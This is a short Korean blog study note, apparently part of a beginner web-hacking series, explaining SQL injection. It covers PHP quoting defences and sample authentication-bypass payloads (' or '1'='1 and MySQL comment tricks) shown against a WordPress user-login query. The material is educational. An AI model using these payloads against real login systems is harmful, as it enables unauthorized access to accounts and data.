SQL 인젝션
-인증우회
-기밀데이터 접근
-웹 사이트 콘텐츠 변경
-DB 서버 shutdown
특수문자를 입력하여 SQL 인젝션 실행
작은따옴표('), 주석 처리에 사용하는 하이픈(-)
PHP에서는 작은따옴표의 취약점을 막도록 다음과 같이 2가지를 지원한다.
1) 함수 addslashes()를 이용하여 작은따옴쵸 기호 앞에 역슬래시(\) 추가
2) php.ini의 magic_quotes_gpc 옵션 활성화(On)->get, post, cookie를 사용하여 넘어온 변숫값에 quotes(',",\, NULL등)가 있으면 자동으로 앞에 역슬래시(\)를 붙인다.
1.
' or '1'='1
select user_login, user_pass, user_email FROM wp_users
where user_login='' or '1'='1' and user_pass='' or '1'='1'
2. 주석이용->패스워드 인증 지나침
MySQL에서 주석처리
-- (하이픈 2개와 스페이스 1개)
#
select user_login, user_pass, user_email FROM wp_users
where user_login=''-- ' and user_pass=''
select user_login, user_pass, user_email FROM wp_users
where user_login=''#' and user_pass=''
'웹 해킹 > 웹 해킹 개념' 카테고리의 다른 글
| [웹 해킹 입문] 6. WireShark (0) | 2018.01.16 |
|---|---|
| [웹 해킹 입문] 5. 스캔 (0) | 2018.01.16 |
| [웹 해킹 입문] 4. LFI&RFI (0) | 2018.01.15 |
| sqlmap (0) | 2018.01.15 |
| [웹 해킹 입문] 1. 웹해킹 개요 (0) | 2018.01.08 |
